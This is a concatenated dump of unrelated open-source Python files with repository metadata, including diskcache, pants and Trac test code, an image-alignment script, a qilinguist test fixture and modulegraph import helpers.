shutil.rmtree(cache_dir2, ignore_errors=True)
def run(command):
print('run$ %r' % command)
try:
result = sp.check_output(command, stderr=sp.STDOUT)
print(result)
except sp.CalledProcessError as exc:
print(exc.output)
raise
def test_rsync():
try:
run(['rsync', '--version'])
except OSError:
return # No rsync installed. Skip test.
rsync_args = ['rsync', '-a', '--checksum', '--delete', '--stats']
cache_dir1 = tempfile.mkdtemp() + os.sep
cache_dir2 = tempfile.mkdtemp() + os.sep
# Store some items in cache_dir1.
with dc.Cache(cache_dir1) as cache1:
for count in range(100):
cache1[count] = str(count)
for count in range(100, 200):
cache1[count] = str(count) * int(1e5)
# Rsync cache_dir1 to cache_dir2.
run(rsync_args + [cache_dir1, cache_dir2])
# Validate items in cache_dir2.
with dc.Cache(cache_dir2) as cache2:
for count in range(100):
assert cache2[count] == str(count)
for count in range(100, 200):
assert cache2[count] == str(count) * int(1e5)
# Store more items in cache_dir2.
with dc.Cache(cache_dir2) as cache2:
for count in range(200, 300):
cache2[count] = str(count)
for count in range(300, 400):
cache2[count] = str(count) * int(1e5)
# Rsync cache_dir2 to cache_dir1.
run(rsync_args + [cache_dir2, cache_dir1])
# Validate items in cache_dir1.
with dc.Cache(cache_dir1) as cache1:
for count in range(100):
assert cache1[count] == str(count)
for count in range(100, 200):
assert cache1[count] == str(count) * int(1e5)
for count in range(200, 300):
assert cache1[count] == str(count)
for count in range(300, 400):
assert cache1[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
def test_custom_eviction_policy(cache):
dc.EVICTION_POLICY['lru-gt-1s'] = {
'init': (
'CREATE INDEX IF NOT EXISTS Cache_access_time ON'
' Cache (access_time)'
),
'get': 'access_time = {now}',
'cull': (
'SELECT {fields} FROM Cache'
' WHERE access_time < ({now} - 1)'
' ORDER BY access_time LIMIT ?'
),
}
size_limit = int(1e5)
cache.reset('eviction_policy', 'lru-gt-1s')
cache.reset('size_limit', size_limit)
for count in range(100, 150):
cache[count] = str(count) * 500
size = cache.volume()
assert size > size_limit
assert cache.cull() == 0
assert size == cache.volume()
for count in range(100, 150):
assert cache[count] == str(count) * 500
time.sleep(1.1)
assert cache.cull() > 0
assert cache.volume() < size_limit
def test_lru_incr(cache):
cache.reset('eviction_policy', 'least-recently-used')
cache.incr(0)
cache.decr(0)
assert cache[0] == 0
def test_memoize(cache):
count = 1000
def fibiter(num):
alpha, beta = 0, 1
for _ in range(num):
alpha, beta = beta, alpha + beta
return alpha
@cache.memoize()
def fibrec(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
return fibrec(num - 1) + fibrec(num - 2)
cache.stats(enable=True)
for value in range(count):
assert fibrec(value) == fibiter(value)
hits1, misses1 = cache.stats()
for value in range(count):
assert fibrec(value) == fibiter(value)
hits2, misses2 = cache.stats()
assert hits2 == (hits1 + count)
assert misses2 == misses1
if __name__ == '__main__':
import nose
nose.runmodule()
| 24.460823 | 79 | 0.610538 |
acf6b4f2fbe9aeb525accbdbb1cd4309d5967ef9 | 44 | py | Python | Chapter16/cf_rfem_hist_price/venv/lib/python3.6/weakref.py | wtwong316/Mastering-Elasticsearch-7.0 | 8e88f938c9feb201649bd23c4d517bc6af93fbaa | [
"MIT"
] | 25 | 2019-03-08T01:03:03.000Z | 2022-02-14T17:38:32.000Z | Chapter16/cf_rfem_hist_price/venv/lib/python3.6/weakref.py | wtwong316/Mastering-Elasticsearch-7.0 | 8e88f938c9feb201649bd23c4d517bc6af93fbaa | [
"MIT"
] | 2 | 2019-02-15T17:34:37.000Z | 2019-07-11T14:37:02.000Z | Chapter16/cf_rfem_hist_price/venv/lib/python3.6/weakref.py | wtwong316/Mastering-Elasticsearch-7.0 | 8e88f938c9feb201649bd23c4d517bc6af93fbaa | [
"MIT"
] | 31 | 2019-01-15T20:16:50.000Z | 2022-03-01T05:47:38.000Z | /home/wai/anaconda3/lib/python3.6/weakref.py | 44 | 44 | 0.818182 |
acf6b51cc4c5d56b25fc663d2f20ed3f6eb229ba | 316 | py | Python | warg/mixins/__init__.py | cnheider/warg | 4bcc5d3e86dd843773ca6cbca21bcab3b8ae84eb | [
"Apache-2.0"
] | 1 | 2018-11-30T09:14:28.000Z | 2018-11-30T09:14:28.000Z | warg/mixins/__init__.py | aivclab/warg | 4bcc5d3e86dd843773ca6cbca21bcab3b8ae84eb | [
"Apache-2.0"
] | 49 | 2019-04-02T12:06:10.000Z | 2019-08-31T14:30:12.000Z | warg/mixins/__init__.py | cnHeider/warg | 4bcc5d3e86dd843773ca6cbca21bcab3b8ae84eb | [
"Apache-2.0"
] | 1 | 2020-10-01T00:18:12.000Z | 2020-10-01T00:18:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__doc__ = r"""
Created on 17/02/2020
"""
__author__ = "Christian Heider Nielsen"
from pathlib import Path
with open(Path(__file__).parent / "README.md", "r") as this_init_file:
__doc__ += this_init_file.read()
from .dict_mixins import *
| 18.588235 | 70 | 0.636076 |
acf6b61236a474ae9c7ef3404a9bcafcd6b89423 | 4,142 | py | Python | image_processor.py | jake-stewart/pca-ann-facial-recognition | 84fe5599904c653d46e222ed271618e6420acead | [
"MIT"
] | null | null | null | image_processor.py | jake-stewart/pca-ann-facial-recognition | 84fe5599904c653d46e222ed271618e6420acead | [
"MIT"
] | null | null | null | image_processor.py | jake-stewart/pca-ann-facial-recognition | 84fe5599904c653d46e222ed271618e6420acead | [
"MIT"
] | null | null | null | from math import sqrt, sin, cos, atan2, floor
from matplotlib import pyplot as plt
import matplotlib.image as mpimg
from PIL import Image
import json
def dist(a, b):
return sqrt(
(b[0] - a[0])**2 +
(b[1] - a[1])**2
)
def fix_rotation(image, left_eye, right_eye):
rot = -atan2(
right_eye[1] - left_eye[1],
right_eye[0] - left_eye[0]
)
x, y = left_eye
c = cos(rot)/1
s = sin(rot)/1
return image.transform(
image.size,
Image.AFFINE,
(
c, s, x - x*c - y*s,
-s, c, y - x*-s - y*c
),
resample=Image.BICUBIC
)
def fix_alignment(image, left_eye, right_eye):
scale = dist(left_eye, right_eye) / 26
x = left_eye[0] - scale * 19
y = left_eye[1] - scale * 19
size = 64 * scale
return image.crop((
int(x),
int(y),
int(x + size),
int(y + size)
))
def fix_size(image):
return image.resize((64, 64), Image.ANTIALIAS)
def format_face(path, left_eye, right_eye, dest_path=None):
# use source path as destination path if no dest provided
if not dest_path:
dest_path = path
image = Image.open(path)
image = fix_rotation(image, left_eye, right_eye)
image = fix_alignment(image, left_eye, right_eye)
image = fix_size(image)
image.save(dest_path)
class EyeLocator:
def __init__(self, image_data, source_dir, dest_dir, plt, index=0):
self.images = []
for subject in image_data:
for image_name in subject:
self.images.append(image_name)
self.master = plt
self.fig = self.master.figure()
self.dest_dir = dest_dir
self.source_dir = source_dir
self.index = index
self.enable_events()
self.next_face()
def enable_events(self):
self.fig.canvas.mpl_connect(
"button_press_event", self.on_click
)
def on_click(self, event):
# no data recorded for image
if self.status == 0:
self.left_eye = (int(event.xdata), int(event.ydata))
self.status = 1
# left eye data recorded for image
elif self.status == 1:
self.right_eye = (int(event.xdata), int(event.ydata))
self.status = 0
self.finished_gathering()
def finished_gathering(self):
# process, increment index, display new face
self.process_data()
self.index += 1
if self.index == len(self.images):
self.master.close()
self.next_face()
def process_data(self):
try:
dest_path = self.dest_dir + "\\" + self.images[self.index]
source_path = self.source_dir + "\\" + self.images[self.index]
format_face(
source_path,
self.left_eye,
self.right_eye,
dest_path
)
except FileNotFoundError:
self.master.close()
print("You must create the directory `{}`".format(
self.dest_dir
))
input() # stop program from instantly closing
exit()
def reset(self):
self.left_eye = None
self.right_eye = None
self.status = 0
def next_face(self):
# reset measurement variables
self.reset()
# load next face
file_name = self.source_dir + "\\" + self.images[self.index]
img = mpimg.imread(file_name)
# draw face
self.master.clf()
self.master.imshow(img, cmap="gray")
self.fig.canvas.draw()
def start(self):
# start matplotlib loop
self.master.show()
if __name__ == "__main__":
# load image data from file
with open("image_data.json") as f:
image_data = json.load(f)
unprocessed_dir = "unprocessed_images"
processed_dir = "processed_images"
EyeLocator(image_data, unprocessed_dir, processed_dir, plt).start()
| 27.613333 | 75 | 0.548286 |
acf6b7cc2c40f2d25f7d4224cd5525bca2a2983b | 4,411 | py | Python | python/qilinguist/test/conftest.py | PrashantKumar-sudo/qibuild | a16ce425cf25127ceff29507feeeeca37af23351 | [
"BSD-3-Clause"
] | null | null | null | python/qilinguist/test/conftest.py | PrashantKumar-sudo/qibuild | a16ce425cf25127ceff29507feeeeca37af23351 | [
"BSD-3-Clause"
] | null | null | null | python/qilinguist/test/conftest.py | PrashantKumar-sudo/qibuild | a16ce425cf25127ceff29507feeeeca37af23351 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" ConfTest """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import os
import py
import qilinguist.worktree
from qisys.test.conftest import * # pylint:disable=W0401,W0614
from qibuild.test.conftest import * # pylint:disable=W0401,W0614
class QiLinguistAction(TestAction):
""" QiLinguistAction Class """
def __init__(self, worktree_root=None):
""" QiLinguistAction Init """
super(QiLinguistAction, self).__init__("qilinguist.actions")
self.build_worktree = TestBuildWorkTree()
self.trad = self.build_worktree.add_test_project("translateme/gettext")
def create_po(self, proj):
""" Create Po """
fr_FR_po_file = os.path.join(proj.path, "po", "fr_FR.po")
en_US_po_file = os.path.join(proj.path, "po", "en_US.po")
fr_file = open(fr_FR_po_file, 'wb')
en_file = open(en_US_po_file, 'wb')
fr_file.write(b"""
# French translations for qi package
# Traductions fran\xc3\xa7aises du paquet qi.
# Copyright (C) 2012 THE qi'S COPYRIGHT HOLDER
# This file is distributed under the same license as the qi package.
# Automatically generated, 2012.
#
msgid ""
msgstr ""
"Project-Id-Version: qi 1.16\\n"
"Report-Msgid-Bugs-To: \\n"
"POT-Creation-Date: 2012-10-09 15:15+0200\\n"
"PO-Revision-Date: 2012-10-09 15:15+0200\\n"
"Last-Translator: Automatically generated\\n"
"Language-Team: none\\n"
"Language: fr\\n"
"MIME-Version: 1.0\\n"
"Content-Type: text/plain; charset=UTF-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
"Plural-Forms: nplurals=2; plural=(n > 1);\\n"
"X-Language: fr_FR\\n"
#: main.cpp:15
msgid "Brian is in the kitchen."
msgstr "Brian est dans la cuisine."
#: main.cpp:13
msgid "Hi, my name is NAO."
msgstr "Bonjour, mon nom est NAO."
#: main.cpp:14
msgid "Where is Brian?"
msgstr "O\xc3\xb9 est Brian ?"
""")
en_file.write(b"""
# English translations for qi package.
# Copyright (C) 2012 THE qi'S COPYRIGHT HOLDER
# This file is distributed under the same license as the qi package.
# Automatically generated, 2012.
#
msgid ""
msgstr ""
"Project-Id-Version: qi 1.16\\n"
"Report-Msgid-Bugs-To: \\n"
"POT-Creation-Date: 2012-10-09 15:15+0200\\n"
"PO-Revision-Date: 2012-10-09 15:15+0200\\n"
"Last-Translator: Automatically generated\\n"
"Language-Team: none\\n"
"Language: en_US\\n"
"MIME-Version: 1.0\\n"
"Content-Type: text/plain; charset=UTF-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\\n"
"X-Language: en_US\\n"
#: main.cpp:15
msgid "Brian is in the kitchen."
msgstr "Brian is in the kitchen."
#: main.cpp:13
msgid "Hi, my name is NAO."
msgstr "Hi, my name is NAO."
#: main.cpp:14
msgid "Where is Brian?"
msgstr "Where is Brian?"
""")
fr_file.close()
en_file.close()
class TestLinguistWorktree(qilinguist.worktree.LinguistWorkTree):
""" TestLinguistWorktree Class """
def __init__(self, worktree=None):
""" TestLinguistWorktree Init """
if not worktree:
worktree = TestWorkTree()
super(TestLinguistWorktree, self).__init__(worktree)
self.tmpdir = py.path.local(self.root) # pylint:disable=no-member
def create_gettext_project(self, name):
""" Create GetText Project """
proj_path = os.path.join(self.root, name)
qisys.sh.mkdir(proj_path, recursive=True)
qiproject_xml = os.path.join(proj_path, "qiproject.xml")
with open(qiproject_xml, "w") as fp:
fp.write("""
<project version="3">
<qilinguist name="{name}" tr="gettext" linguas="fr_FR en_US" />
</project>
""".format(name=name))
self.worktree.add_project(name)
return self.get_linguist_project(name, raises=True)
@pytest.fixture
def qilinguist_action(cd_to_tmpdir):
""" QiLinguits Action """
return QiLinguistAction()
@pytest.fixture
def linguist_worktree(cd_to_tmpdir):
""" Linguits Worktree """
return TestLinguistWorktree()
| 31.507143 | 84 | 0.649286 |
acf6b9a625dc2de31956f51e3a2410c33c940023 | 4,692 | py | Python | tests/python/pants_test/tasks/test_cache_manager.py | areitz/pants | 9bfb3feb0272c05f36e190c9147091b97ee1950d | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/tasks/test_cache_manager.py | areitz/pants | 9bfb3feb0272c05f36e190c9147091b97ee1950d | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/tasks/test_cache_manager.py | areitz/pants | 9bfb3feb0272c05f36e190c9147091b97ee1950d | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import shutil
import tempfile
from pants.base.build_invalidator import CacheKey, CacheKeyGenerator
from pants.base.cache_manager import InvalidationCacheManager, InvalidationCheck, VersionedTarget
from pants_test.base_test import BaseTest
class AppendingCacheKeyGenerator(CacheKeyGenerator):
"""Generates cache keys for versions of target sets."""
@staticmethod
def combine_cache_keys(cache_keys):
if len(cache_keys) == 1:
return cache_keys[0]
else:
sorted_cache_keys = sorted(cache_keys) # For commutativity.
combined_id = ','.join([cache_key.id for cache_key in sorted_cache_keys])
combined_hash = ','.join([cache_key.hash for cache_key in sorted_cache_keys])
combined_num_sources = reduce(lambda x, y: x + y,
[cache_key.num_sources for cache_key in sorted_cache_keys], 0)
return CacheKey(combined_id, combined_hash, combined_num_sources)
def key_for_target(self, target, sources=None, transitive=False, fingerprint_strategy=None):
return CacheKey(target.id, target.id, target.num_chunking_units)
def key_for(self, tid, sources):
return CacheKey(tid, tid, len(sources))
def print_vt(vt):
print('%d (%s) %s: [ %s ]' % (len(vt.targets), vt.cache_key, vt.valid, ', '.join(['%s(%s)' % (v.id, v.cache_key) for v in vt.versioned_targets])))
class InvalidationCacheManagerTest(BaseTest):
    """Exercises InvalidationCacheManager target wrapping and partitioning."""

    class TestInvalidationCacheManager(InvalidationCacheManager):
        # Concrete manager wired to the deterministic AppendingCacheKeyGenerator
        # above and a per-test temporary invalidation directory.
        def __init__(self, tmpdir):
            InvalidationCacheManager.__init__(self, AppendingCacheKeyGenerator(), tmpdir, True)

    def setUp(self):
        super(InvalidationCacheManagerTest, self).setUp()
        self._dir = tempfile.mkdtemp()
        self.cache_manager = InvalidationCacheManagerTest.TestInvalidationCacheManager(self._dir)

    def tearDown(self):
        shutil.rmtree(self._dir, ignore_errors=True)
        super(InvalidationCacheManagerTest, self).tearDown()

    def make_vts(self, target):
        # Wrap a single target; its id doubles as the version token.
        return VersionedTarget(self.cache_manager, target, target.id)

    def test_partition(self):
        # The default EmptyPayload chunking unit happens to be 1, so each of these Targets
        # has a chunking unit contribution of 1
        a = self.make_target(':a', dependencies=[])
        b = self.make_target(':b', dependencies=[a])
        c = self.make_target(':c', dependencies=[b])
        d = self.make_target(':d', dependencies=[c, a])
        e = self.make_target(':e', dependencies=[d])
        targets = [a, b, c, d, e]

        def print_partitions(partitions):
            # Debug aid: prints each partition's target ids on one line.
            strs = []
            for partition in partitions:
                strs.append('(%s)' % ', '.join([t.id for t in partition.targets]))
            print('[%s]' % ' '.join(strs))

        # Verify basic data structure soundness.
        all_vts = self.cache_manager.wrap_targets(targets)
        # NOTE: relies on Python 2 filter() returning a list (len() below).
        invalid_vts = filter(lambda vt: not vt.valid, all_vts)
        self.assertEquals(5, len(invalid_vts))
        self.assertEquals(5, len(all_vts))
        vts_targets = [vt.targets[0] for vt in all_vts]
        self.assertEquals(set(targets), set(vts_targets))

        # Test a simple partition.
        ic = InvalidationCheck(all_vts, [], 3)
        partitioned = ic.all_vts_partitioned
        print_partitions(partitioned)

        # Several correct partitionings are possible, but in all cases 4 1-source targets will be
        # added to the first partition before it exceeds the limit of 3, and the final target will
        # be in a partition by itself.
        self.assertEquals(2, len(partitioned))
        self.assertEquals(4, len(partitioned[0].targets))
        self.assertEquals(1, len(partitioned[1].targets))

        # Test partition with colors.
        red = 'red'
        blue = 'blue'
        colors = {
            a: blue,
            b: red,
            c: red,
            d: red,
            e: blue
        }

        # As a reference, we partition without colors.
        ic = InvalidationCheck(all_vts, [], 2)
        partitioned = ic.all_vts_partitioned
        print_partitions(partitioned)
        self.assertEquals(2, len(partitioned))
        self.assertEquals(3, len(partitioned[0].targets))
        self.assertEquals(2, len(partitioned[1].targets))

        # Now apply color restrictions.
        ic = InvalidationCheck(all_vts, [], 2, target_colors=colors)
        partitioned = ic.all_vts_partitioned
        print_partitions(partitioned)
        self.assertEquals(3, len(partitioned))
        self.assertEquals(1, len(partitioned[0].targets))
        self.assertEquals(3, len(partitioned[1].targets))
        self.assertEquals(1, len(partitioned[2].targets))
| 36.65625 | 148 | 0.705882 |
acf6bc135a4f96058ae1351214cb3983b530807b | 3,171 | py | Python | telemetry/third_party/modulegraph/modulegraph/util.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | telemetry/third_party/modulegraph/modulegraph/util.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | telemetry/third_party/modulegraph/modulegraph/util.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | from __future__ import absolute_import
import os
import imp
import sys
import re
import marshal
import warnings
try:
unicode
except NameError:
unicode = str
if sys.version_info[0] == 2:
from StringIO import StringIO as BytesIO
from StringIO import StringIO
else:
from io import BytesIO, StringIO
def imp_find_module(name, path=None):
    """Locate *name* like imp.find_module, but accept dotted module names.

    Each dotted component is resolved in turn, using the directory of the
    previous component as the search path.  Returns imp.find_module's
    (file, pathname, description) tuple for the final component; any file
    object opened for an intermediate component is closed immediately.
    """
    if path is not None and isinstance(path, (str, unicode)):
        path = [os.path.realpath(path)]
    result = None
    for part in name.split('.'):
        result = imp.find_module(part, path)
        if result[0] is not None:
            result[0].close()
        path = [result[1]]
    return result
def _check_importer_for_path(name, path_item):
    """Find *name* on a single sys.path entry, honouring PEP 302 hooks.

    Primes sys.path_importer_cache for *path_item* on a miss by probing
    sys.path_hooks; falls back to the classic imp.find_module search when
    no hook claims the entry.  Returns the hook finder's result, an
    imp-style tuple, or None when nothing matches.
    """
    if path_item in sys.path_importer_cache:
        importer = sys.path_importer_cache[path_item]
    else:
        importer = None
        for hook in sys.path_hooks:
            try:
                importer = hook(path_item)
            except ImportError:
                continue
            break
        sys.path_importer_cache.setdefault(path_item, importer)

    if importer is None:
        try:
            return imp.find_module(name, [path_item])
        except ImportError:
            return None
    return importer.find_module(name)
def imp_walk(name):
    """
    yields namepart, tuple_or_importer for each path item

    raise ImportError if a name can not be found.

    For each dotted component of *name* this yields a pair of the
    component and an imp-style (file, pathname, description) tuple.
    Sources found via PEP 302 loaders are repackaged into the classic
    imp tuple shape so callers can treat both uniformly.
    """
    warnings.warn("imp_walk will be removed in a future version", DeprecationWarning)

    if name in sys.builtin_module_names:
        yield name, (None, None, ("", "", imp.C_BUILTIN))
        return

    paths = sys.path
    res = None
    for namepart in name.split('.'):
        for path_item in paths:
            res = _check_importer_for_path(namepart, path_item)
            if hasattr(res, 'load_module'):
                if res.path.endswith('.py') or res.path.endswith('.pyw'):
                    fp = StringIO(res.get_source(namepart))
                    res = (fp, res.path, ('.py', 'rU', imp.PY_SOURCE))
                elif res.path.endswith('.pyc') or res.path.endswith('.pyo'):
                    co = res.get_code(namepart)
                    fp = BytesIO(imp.get_magic() + b'\0\0\0\0' + marshal.dumps(co))
                    res = (fp, res.path, ('.pyc', 'rb', imp.PY_COMPILED))
                else:
                    # BUGFIX: this branch referenced an undefined name
                    # ``loader`` (NameError at runtime); the loader object
                    # is bound to ``res`` here.
                    res = (None, res.path,
                           (os.path.splitext(res.path)[-1], 'rb',
                            imp.C_EXTENSION))
                break
            elif isinstance(res, tuple):
                break
        else:
            # No path entry matched this component: fall through to the
            # ImportError below.
            break

        yield namepart, res
        # Descend into the package directory for the next component.
        paths = [os.path.join(path_item, namepart)]
    else:
        return

    raise ImportError('No module named %s' % (name,))
# PEP 263 coding-cookie pattern.  BUGFIX: the pattern used a plain bytes
# literal containing "\s" and "\w", which are invalid escape sequences
# (DeprecationWarning, and a SyntaxError in future Pythons); a raw bytes
# literal expresses the same regex safely on Python 2 and 3.
cookie_re = re.compile(br"coding[:=]\s*([-\w.]+)")

# Fallback source encoding when no cookie is present:
# ASCII on Python 2 (PEP 263), UTF-8 on Python 3 (PEP 3120).
if sys.version_info[0] == 2:
    default_encoding = 'ascii'
else:
    default_encoding = 'utf-8'
def guess_encoding(fp):
    """Return the source encoding declared in *fp*'s first two lines.

    Scans up to two lines for a PEP 263 coding cookie and returns the
    declared codec name; falls back to the module-level default_encoding
    when no cookie is found.
    """
    for _ in (0, 1):
        match = cookie_re.search(fp.readline())
        if match is not None:
            return match.group(1).decode('ascii')
    return default_encoding
| 26.425 | 105 | 0.577105 |
acf6bc2790e65582c2f0415f2eaacf439a83d112 | 16,156 | py | Python | trac/tests/functional/testcases.py | haskell-infra/trac | 5e086948718893ede9965ea4ce3625da32676730 | [
"BSD-3-Clause"
] | null | null | null | trac/tests/functional/testcases.py | haskell-infra/trac | 5e086948718893ede9965ea4ce3625da32676730 | [
"BSD-3-Clause"
] | 1 | 2019-03-20T19:13:53.000Z | 2019-08-14T20:15:09.000Z | trac/tests/functional/testcases.py | haskell-infra/trac | 5e086948718893ede9965ea4ce3625da32676730 | [
"BSD-3-Clause"
] | 2 | 2019-03-20T01:23:30.000Z | 2019-12-06T16:13:07.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008-2013 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import os
import re
import time
import unittest
from trac.tests.functional import FunctionalTwillTestCaseSetup, \
internal_error, tc
from trac.util import create_file
class TestAttachmentNonexistentParent(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """TracError should be raised when navigating to the attachment
        page for a nonexistent resource."""
        self._tester.go_to_wiki('NonexistentPage')
        tc.find("The page <strong>NonexistentPage</strong> does not exist. "
                "You can create it here.")
        tc.find(r"\bCreate this page\b")

        # The attachment listing for the missing page must fail with a
        # clean TracError rather than an internal error.
        tc.go(self._tester.url + '/attachment/wiki/NonexistentPage')
        tc.find('<h1>Trac Error</h1>\s+<p class="message">'
                'Parent resource NonexistentPage doesn\'t exist</p>')


class TestAboutPage(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Validate the About page."""
        tc.follow(r"\bAbout Trac\b")
        tc.find(r"<h1>About Trac</h1>")
        tc.find(r"<h2>System Information</h2>")
        tc.find(r"<h2>Configuration</h2>")


class TestErrorPage(FunctionalTwillTestCaseSetup):
    """Validate the error page.

    Defects reported to trac-hacks should use the Component defined in the
    plugin's URL (#11434).
    """
    def runTest(self):
        # Install a throwaway plugin that raises on /raise-exception; with
        # ?report=tho it first sets a trac-hacks url so the error page's
        # "report" form should point at trac-hacks instead of edgewall.
        env = self._testenv.get_trac_environment()
        env.config.set('components', 'RaiseExceptionPlugin.*', 'enabled')
        env.config.save()
        create_file(os.path.join(env.plugins_dir, 'RaiseExceptionPlugin.py'),
"""\
from trac.core import Component, implements
from trac.web.api import IRequestHandler

url = None

class RaiseExceptionPlugin(Component):
    implements(IRequestHandler)

    def match_request(self, req):
        if req.path_info.startswith('/raise-exception'):
            return True

    def process_request(self, req):
        if req.args.get('report') == 'tho':
            global url
            url = 'http://trac-hacks.org/wiki/HelloWorldMacro'
        raise Exception
""")
        self._testenv.restart()

        try:
            tc.go(self._tester.url + '/raise-exception')
            tc.find(internal_error)
            tc.find('<form class="newticket" method="get" '
                    'action="https://trac.edgewall.org/newticket">')

            tc.go(self._tester.url + '/raise-exception?report=tho')
            tc.find(internal_error)
            tc.find('<form class="newticket" method="get" '
                    'action="http://trac-hacks.org/newticket">')
            tc.find('<input type="hidden" name="component" '
                    'value="HelloWorldMacro" />')
        finally:
            env.config.set('components', 'RaiseExceptionPlugin.*', 'disabled')
class RegressionTestRev6017(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of the plugin reload fix in r6017"""
        # Setup the DeleteTicket plugin
        env = self._testenv.get_trac_environment()
        # BUGFIX: the plugin source was read and written via bare open()
        # calls whose file handles were never closed; use context managers
        # so the handles are released deterministically.
        with open(os.path.join(self._testenv.trac_src,
                               'sample-plugins', 'workflow',
                               'DeleteTicket.py')) as plugin_file:
            plugin = plugin_file.read()
        plugin_path = os.path.join(env.plugins_dir, 'DeleteTicket.py')
        with open(plugin_path, 'w') as plugin_file:
            plugin_file.write(plugin)
        prevconfig = env.config.get('ticket', 'workflow')
        env.config.set('ticket', 'workflow',
                       prevconfig + ',DeleteTicketActionController')
        env.config.save()
        env = self._testenv.get_trac_environment()  # reloads the environment

        loaded_components = env.compmgr.__metaclass__._components
        delete_plugins = [c for c in loaded_components
                          if 'DeleteTicketActionController' in c.__name__]
        try:
            # The r6017 regression caused plugins to load twice on reload.
            self.assertEqual(len(delete_plugins), 1,
                             "Plugin loaded more than once.")
        finally:
            # Remove the DeleteTicket plugin
            env.config.set('ticket', 'workflow', prevconfig)
            env.config.save()
            for ext in ('py', 'pyc', 'pyo'):
                filename = os.path.join(env.plugins_dir,
                                        'DeleteTicket.%s' % ext)
                if os.path.exists(filename):
                    os.unlink(filename)
class RegressionTestTicket3833a(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of http://trac.edgewall.org/ticket/3833 a"""
        env = self._testenv.get_trac_environment()
        # Assume the logging is already set to debug.
        # NOTE(review): the log file handle is never closed; harmless for a
        # short-lived functional test process but worth tidying.
        traclogfile = open(os.path.join(env.log_dir, 'trac.log'))
        # Seek to the end of file so we only look at new log output
        traclogfile.seek(0, 2)

        # Verify that logging is on initially
        env.log.debug("RegressionTestTicket3833 debug1")
        debug1 = traclogfile.read()
        self.assertNotEqual(debug1.find("RegressionTestTicket3833 debug1"), -1,
                            'Logging off when it should have been on.\n%r'
                            % debug1)


class RegressionTestTicket3833b(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of http://trac.edgewall.org/ticket/3833 b"""
        # Turn logging off, try to log something, and verify that it does
        # not show up.
        env = self._testenv.get_trac_environment()
        traclogfile = open(os.path.join(env.log_dir, 'trac.log'))
        # Seek to the end of file so we only look at new log output
        traclogfile.seek(0, 2)

        env.config.set('logging', 'log_level', 'INFO')
        env.config.save()
        env = self._testenv.get_trac_environment()
        env.log.debug("RegressionTestTicket3833 debug2")
        env.log.info("RegressionTestTicket3833 info2")
        debug2 = traclogfile.read()
        # INFO must appear, DEBUG must not.
        self.assertNotEqual(debug2.find("RegressionTestTicket3833 info2"), -1,
                            'Logging at info failed.\n%r' % debug2)
        self.assertEqual(debug2.find("RegressionTestTicket3833 debug2"), -1,
                         'Logging still on when it should have been off.\n%r'
                         % debug2)


class RegressionTestTicket3833c(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of http://trac.edgewall.org/ticket/3833 c"""
        # Turn logging back on, try to log something, and verify that it
        # does show up.
        env = self._testenv.get_trac_environment()
        traclogfile = open(os.path.join(env.log_dir, 'trac.log'))
        # Seek to the end of file so we only look at new log output
        traclogfile.seek(0, 2)

        env.config.set('logging', 'log_level', 'DEBUG')
        time.sleep(2)
        env.config.save()
        #time.sleep(2)
        env = self._testenv.get_trac_environment()
        #time.sleep(2)
        env.log.debug("RegressionTestTicket3833 debug3")
        env.log.info("RegressionTestTicket3833 info3")
        #time.sleep(2)
        debug3 = traclogfile.read()
        message = ''
        success = debug3.find("RegressionTestTicket3833 debug3") != -1
        if not success:
            # Ok, the testcase failed, but we really need logging enabled.
            env.log.debug("RegressionTestTicket3833 fixup3")
            fixup3 = traclogfile.read()
            message = 'Logging still off when it should have been on.\n' \
                      '%r\n%r' % (debug3, fixup3)
        self.assertTrue(success, message)


class RegressionTestTicket5572(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of http://trac.edgewall.org/ticket/5572"""
        # TODO: this ticket (implemented in r6011) adds a new feature to
        # make the progress bar more configurable. We need to test this
        # new configurability.
class RegressionTestTicket7209(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of http://trac.edgewall.org/ticket/7209"""
        # Attachment descriptions must survive a replace-with-empty-description
        # and be overridden by a replace-with-new-description.
        ticketid = self._tester.create_ticket()
        self._tester.create_ticket()
        self._tester.add_comment(ticketid)
        self._tester.attach_file_to_ticket(ticketid, filename='hello.txt',
                                           description='Preserved Descr')
